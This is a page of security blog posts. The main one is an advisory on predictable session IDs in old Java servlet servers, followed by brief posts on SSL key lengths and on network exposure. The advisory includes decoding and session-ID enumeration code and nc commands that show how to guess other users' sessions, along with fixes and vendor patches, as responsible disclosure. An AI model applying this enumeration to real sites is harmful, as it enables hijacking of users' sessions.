Security Advisory 2001-01.1 - Predictable Session IDs
1st January, 2003

Vulnerable Products: Java Application Servers based on Sun's reference implementation of the Java Servlet Developers Kit (JSDK 2.0), without enhancements to the session management code, may be vulnerable. Affected products are listed under Vendor Patches and Comments below.
Not Vulnerable: Products based on JSDK V2.1 onward, which uses a different algorithm, or products that conform to the 2.x Java Servlet API but use custom session management code.
Impact: Hijacking of user sessions
Affects: Websites using vulnerable products as stated above
Revision history: Released to Vendors: 6th November 2000
Overview
Many websites support the idea of user sessions - each user connecting to the site is issued with a unique session ID, which is then used to identify all subsequent requests made by that user, either encoded in the URLs, or as a cookie. The server can then store data for each user session, for instance the state of a web shopping cart. Session IDs are also often used to control access to sites requiring a login; instead of sending the username/password with every request, the site issues a session ID after the user logs on, which identifies the user for the rest of the session.
With some server session management systems, it is possible for a user who can connect to the server and obtain a session ID to guess other users' session IDs. If successful, the attacker can then view any page, take any action, and post to any form that the real user of that session could.
This attack requires no IP spoofing or session snooping. It works against sites using SSL. Netcraft has successfully proven this attack against machines using cookie-based and URL rewriting-based session management.
Details
From a security point of view, the important properties of a session ID should be that it is unique, and it is not possible for one user to guess another user's session ID.
One way to ensure uniqueness is to include a session counter or timestamp in the session ID. In particular, for the sites we found to be vulnerable, the session ID included:
- A session counter
- The IP address of the server
- A value made by combining the date, session counter, and current system time in milliseconds (we'll call this the timestamp)
This certainly appears sufficient to ensure uniqueness. However, if one user can get this information out of his session ID, he can clearly use it to guess other users' session IDs.
Encoding of Session IDs
For servers Netcraft has identified as vulnerable, the session ID is encoded using a simple rule. 5 bits at a time are taken from the binary session ID; these 5 bits form a number between 0 and 31. Numbers 0-25 are encoded with the corresponding letters A-Z; numbers 26-31 are encoded by the digits 0-5 respectively. It's a kind of "base32" encoding - which can be decoded trivially.
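The encoding rule can be sketched as a short decoder (a Python sketch; the advisory's original tools were Perl scripts, and the function name here is ours):

```python
# "Base32" alphabet described above: 5 bits per character,
# A-Z encode 0-25, digits 0-5 encode 26-31.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"

def decode_session_id(encoded):
    # Concatenate 5 bits per character, then read off whole bytes;
    # trailing bits that do not fill a byte are padding and are dropped.
    bits = "".join(format(ALPHABET.index(c), "05b") for c in encoded)
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))

raw = decode_session_id("FGAZOWQAAAK2RQFIAAAU45Q")
print(raw.hex())  # 2981975a000015c8c0a800014f7e
```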
Here's a typical session ID being decoded:
$ echo -n "FGAZOWQAAAK2RQFIAAAU45Q" | ./base32.pl -d
29 81 97 5a 00 00 15 c8 c0 a8 00 01 4f 7e
This breaks up as: (all integers are in network byte order)
- Bytes 0-3: Timestamp
- Bytes 4-7: Session count
- Bytes 8-11: IP address of the server issuing the session ID
- Bytes 12-13: Random number (or zero, see below)
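Under that layout, the hex bytes shown above unpack as follows (a Python sketch; `parse_session_fields` is our own name, and all integers are big-endian as noted):

```python
import socket
import struct

def parse_session_fields(raw):
    # Bytes 0-3: timestamp, bytes 4-7: session count (network byte order),
    # bytes 8-11: server IP address, bytes 12-13: "random" extra bytes.
    timestamp, count = struct.unpack(">II", raw[:8])
    ip = socket.inet_ntoa(raw[8:12])
    extra = raw[12:14]
    return timestamp, count, ip, extra

raw = bytes.fromhex("2981975a000015c8c0a800014f7e")
timestamp, count, ip, extra = parse_session_fields(raw)
print(hex(timestamp), count, ip, extra.hex())  # session count 5576, IP 192.168.0.1
```

Note that the timestamp field is the opaque combined value described above, not a plain Unix time; the advisory's decode-sessionid.pl interprets it further.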
The Attack
We now know everything we need to try to hijack another user's session. The timestamp is always increasing, the session count simply increments, and the internal server IP address is constant. If we make two requests to the server, and the session count of the second request is more than 1 higher than the session count of the first, then we know that another session has started in between. We know also that the timestamp of that session will be between our two timestamps.
The two "random bytes" might have been a stumbling block, but:
- The random bytes are not used by all servers, in which case they are zero.
- For many servers tried, the random bytes are only generated when the server is started; they are the same for all user sessions.
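Given the bracketing observations above, the enumeration step can be sketched as follows (a Python sketch, not the tool used in the advisory; `encode_session_id` and `candidate_ids` are our own names, and in practice the timestamp range comes from the attacker's own two requests):

```python
import socket
import struct

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"

def encode_session_id(raw):
    # Inverse of the server's "base32": emit 5 bits per character,
    # zero-padding the tail to a whole character.
    bits = "".join(format(b, "08b") for b in raw)
    bits += "0" * (-len(bits) % 5)
    return "".join(ALPHABET[int(bits[i:i + 5], 2)] for i in range(0, len(bits), 5))

def candidate_ids(ts_low, ts_high, count, server_ip, extra):
    # Try every timestamp between our two bracketing requests for a
    # session count we know was issued in between.
    ip = socket.inet_aton(server_ip)
    for ts in range(ts_low, ts_high + 1):
        yield encode_session_id(struct.pack(">II", ts, count) + ip + extra)
```

Because the count is known exactly and the timestamp is bracketed, the candidate set is small; each candidate is simply tried against the server.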
For example, a couple of consecutive session IDs from a website might be something like this:
$ perl -e 'print "HEAD / HTTP/1.0\n\n"' | \
    nc www.example.com 80 | grep sessionid
Set-cookie: sessionid=FGAZOWQAAAK2RQFIAAAU45Q;path=/
$ ./decode-sessionid.pl -s FGAZOWQAAAK2RQFIAAAU45Q
SessionID gives: Thu Oct 12 12:34:06 2000, session count = 5576, IP Address = 192.168.0.1
Extra = 4f (79) 7e (126)
$ perl -e 'print "HEAD / HTTP/1.0\n\n"' | \
    nc www.example.com 80 | grep sessionid
Set-cookie: sessionid=FGFLIHYAAALJVQFIAAAU45Q;path=/
$ ./decode-sessionid.pl -s FGFLIHYAAALJVQFIAAAU45Q
SessionID gives: Thu Oct 12 12:38:44 2000, session count = 5786, IP Address = 192.168.0.1
Extra = 4f (79) 7e (126)
Note that all session IDs in this report were obtained from real servers, but have been modified to avoid naming those servers. The name of the session ID is usually, but not always, "sessionid", "sesessionid", "JSESSIONID" or "jwssessionid".
The random extra bytes don't seem to be very random, but you do need to watch out for load-balanced servers, as each will have different counts and random elements.
Consequences
Once an attacker has guessed another user's session ID, they have full access to that user's session (assuming the session ID is the sole identifier for session management and security purposes, which it is on many sites). If the service provides a means of "logging out", the session ID is only useful until the real user logs out. Until then, the attacker can typically view any page, take any action, and post to any form that the real user can on the site, and the real user will be unaware of this until some action the attacker takes has a visible result. Basically, it's very bad news.
Of course, the fact that the session IDs leak internal IP addresses and, perhaps more importantly from a business point of view, the server's session count (an easy way to track the popularity of competitors' sites) is in itself a cause for concern.
Testing Vulnerability
There are a large number of servers on the Internet using session ID cookies or URL re-writing encoded in this fashion. The easiest way to identify such sites is to find a page on the site which generates a session ID (often this is either the home page, or the page which processes logins), then make a few requests to this page, and compare the session IDs, looking for the incrementing session count.
Netcraft is reluctant to give a more exact test here, because it could lead to a false sense of security for administrators whose sites don't display the behaviour described above. Netcraft has seen some variations on the basic theme (e.g. some servers have longer session IDs than those described here, but the extra data appears constant).
Recommendations
- There should be some real random input to the session IDs if they are to be used as the sole means of session tracking and management.
- Any meaningful data being used in session IDs should be one-way encrypted. You shouldn't be trusting users to play fair with this information.
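As an illustration of the first recommendation, a session ID can be drawn entirely from a cryptographically secure random source (a Python sketch using the standard `secrets` module; this is illustrative only, not the fix shipped by any of the vendors below):

```python
import secrets

def new_session_id():
    # 128 bits from the OS CSPRNG: no counter, clock or server address
    # is recoverable from the ID, and guessing another user's ID is
    # computationally infeasible.
    return secrets.token_urlsafe(16)

print(new_session_id())
```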
Recent versions of Sun's Java servlet code (from version 2.1) use a new session ID system, which includes a large random component. However, developers building application servers should enhance the code to make the session count inaccessible.
The Apache Tomcat project, starting with Tomcat version 3.2, uses a secure random number generator, and maintains uniqueness of session IDs without leaking the session count.
Vendor Patches and Comments
ATG
Bug numbers:
Dynamo 5.1, Dynamo 5.0 Patch 2 - Bug #29826
Dynamo 4.5.1 Patch 5 - Bug #25925
Dynamo 4.1.0 Patch 9 - Bug #31956
Dynamo 4.0.1 Patch 4 - Bug #31957
Dynamo 3.5.1 Patch 8 - Bug #32277
Versions affected:
Dynamo 3.5.1, Dynamo 3.5.1 Patch 1 through 7
Dynamo 4.0.1, Dynamo 4.0.1 Patch 1 through 3
Dynamo 4.1.0, Dynamo 4.1.0 Patch 1 through 8
Dynamo 4.5.0, Dynamo 4.5.0 Patch 1 through 5
Dynamo 4.5.1, Dynamo 4.5.1 Patch 1 through 4
Dynamo 5.0, Dynamo 5.0 Patch 1
Versions not affected:
Dynamo 5.1, Dynamo 5.0 Patch 2 and all future releases
Dynamo 4.5.1 Patch 5 and all future releases
Dynamo 4.1.0 Patch 9 and all future releases
Dynamo 4.0.1 Patch 4 and all future releases
Dynamo 3.5.1 Patch 8 and all future releases
Patch location:
Available to registered users in the support area on atg.com, under "Dynamo Patches".
Dynamo 5.1, Dynamo 5.0 Patch 2, Dynamo 4.5.1 Patch 5 are available as of 20th December, 2000.
Dynamo 3.5.1 through 4.1.0 patches should be available in mid-January 2001.
IBM
"With V2.x, we have always had hooks in the HttpSession support to allow applications to associate authentication information with a session and prevent access to that session if the right credentials are not provided. For customer applications who could not do this, we earlier this year provided a V2.x patch which further 'randomizes' the session ID, using a triple DES encryption ID generation algorithm.
With V3.x, we feel we have always prevented this issue - There is built in coupling between the HttpSession and WebSphere security, where authentication is automatically associated with the session and thus is used to prevent all unauthenticated access. One can review the WebSphere documentation to review all the various means available for securely maintaining this authorization."
E-fix PQ47663 is now available for version 3.02 and 3.5.x of WebSphere. For version 2, ask WebSphere support for the "version 2 HttpSession ID randomization change".
Sun Microsystems
For Java Web Server 1.1.1 or 1.1.2, first upgrade the Java Web Server and then install the appropriate patch:
Version 2.0 Patch 4
Version 1.1.3 Patch 4
Patches available from http://www.sun.com/software/jwebserver/upgrade/index.html.
Disclaimer
This information is provided on an AS IS basis in the hope that it is useful in securing vulnerable computer systems; however Netcraft cannot guarantee its accuracy or accept responsibility for any damage resulting from the release of this advisory.
Netcraft
For more information on Netcraft security services, please see http://news.netcraft.com/archives/security.html
Posted by Martyn Tovey in Security
Crypto Regulations Cast Long Shadow
11th March, 2002
Recently, the strength of SSL key lengths has been the subject of heated debate in security circles, after Nicko van Someren disclosed that he is able to break 512-bit keys in around six weeks, using conventional office computers.
The analysis focuses on the key length used for the server's public key (the key which is used to prove the authenticity of the server to web browsers). The longer the key, the harder it is for an attacker to break the key - if this key is broken, it can compromise both past and future secure browsing sessions, and allow the attacker to impersonate the server. Most experts currently recommend a key length of at least 1024 bits as secure and some of the strongest debate has concerned the perceived safety of these 1024 bit keys.
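To put rough numbers on "the longer the key, the harder it is to break": the standard heuristic running time for factoring an n-bit RSA modulus with the general number field sieve is L_n[1/3, (64/9)^(1/3)]. A quick sketch (our own illustration, ignoring constant factors, so only the ratio is meaningful) suggests a 1024-bit key costs millions of times more factoring effort than a 512-bit one:

```python
import math

def gnfs_work(bits):
    # Heuristic GNFS running time L_n[1/3, (64/9)^(1/3)] for an n-bit
    # modulus; constants are dropped, so only ratios are meaningful.
    ln_n = bits * math.log(2)
    return math.exp((64 / 9) ** (1 / 3) * ln_n ** (1 / 3) * math.log(ln_n) ** (2 / 3))

ratio = gnfs_work(1024) / gnfs_work(512)
print(f"1024-bit vs 512-bit factoring effort: roughly {ratio:.1e}x")
```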
However, a more timely aspect to the work is to highlight the number of SSL servers currently in use on the internet, and their geographical location.
Although US export restrictions on strong cryptography have been relaxed in recent years, data collected as part of our SSL Server Survey shows that US export legislation, together with local legislation restricting the use of cryptography in countries with repressive or eccentric administrations, still casts a shadow over the security of ecommerce years after the laws were repealed.
Country | Percentage of sites with short keys
---|---
Canada | 13.5%
USA | 15.1%
UK | 26.5%
Spain | 31.9%
France | 41.1%
Internet-wide, around 18% of SSL servers use potentially vulnerable key lengths. However, these tend to be concentrated in geographical areas outside the United States and its close trading partners. In the US, where over 60% of SSL sites are situated, and in Canada, only around 15% of sites use short keys. In most European countries over 25% still use short keys, and in France, which had laws restricting the use of cryptography until relatively recently, over 40% of sites use short keys.
US export regulations (described in detail by the crypto law survey) have had a discernible impact in slowing the use of strong cryptography outside the States. One reason export-grade cryptography remains quite common is that the relative weakness of the server's choice of cryptography is not obvious to the end user, so there is little pressure to make the change. Browser developers are in a position to help change this, perhaps by displaying a graded indication of key length rather than the present lock symbol, which is displayed on all SSL sessions regardless of strength.
Posted in Security
Is it safe to connect your network to the Internet?
29th October, 1996
Presented at Networld + Interop London, October 1996.
What makes you think you have a choice, anyway?
The importance of making one's company accessible to the internet community is already well understood. Very few companies of any stature attempt to operate without, at the very least, a promotional presence on the web and the ability to exchange SMTP mail with the outside world.
However, what distinguishes the effectiveness of a company's relationship with the internet is the degree of integration between its internal information systems and the company's interface to external networks. The internet community become bored with purely promotional material very quickly, and require interaction with a company via the internet to be at least as effective as they might achieve by telephone, or by letter, or by visiting the offices of the company.
One example of a company trying to achieve this level of integration is Blackwells Bookshops, where the bookseller's stock control database is accessed via the website, so that a prospective purchaser can see how many copies of a book the shop has in stock. The company also uses the site to promote its Personal Accounts. With at least 300 internet bookshops, and competition from mail order and catalogue booksellers, being able to demonstrate that a book can be promptly delivered from stock, and promoting customer bonding through account facilities, are cornerstones of its approach.
Another example, that has become a classic within its own industry is the Federal Express parcel tracking system. Here, people can follow the progress of their shipment by directly interrogating FedEx's tracking system through a web based interface.
Other well established business models which depend on a successful technical and cultural integration with the internet include Walnut Creek's CDROM publishing business, Jobserve's contract computer consultancy listings, and O'Reilly's book and software publishing business where prospective authors, developers and customers can all successfully interact with the company via the internet.
Eighteen months ago, companies such as these attracted considerable esteem through their activities on the internet. It was then unusual for a company to have the internet as a key part of the way in which it managed its customer relationship throughout the sales cycle, from promotion and awareness forming to pre-sales, sales support, transaction processing, and after sales support.
However, this is now becoming the norm rather than the exception. FedEx's competitors also have internet interfaces to their parcel tracking systems and many booksellers other than Blackwells are properly equipped to fulfill requirements from the internet community.
People now expect, as a matter of course, to be able to deal effectively with their suppliers via the internet. Whereas eighteen months ago a company that could properly support a relationship with its customers via the internet might have been thought innovative, today a company that cannot is clearly losing the respect of its customers. Whereas people once thought well of FedEx because they offered internet-based parcel tracking, people now think poorly of Parcelforce because they don't.
Hence, the question is not so much Is it safe to connect our Network to the Internet?, but We have to connect our Network to the Internet, how can we defend it?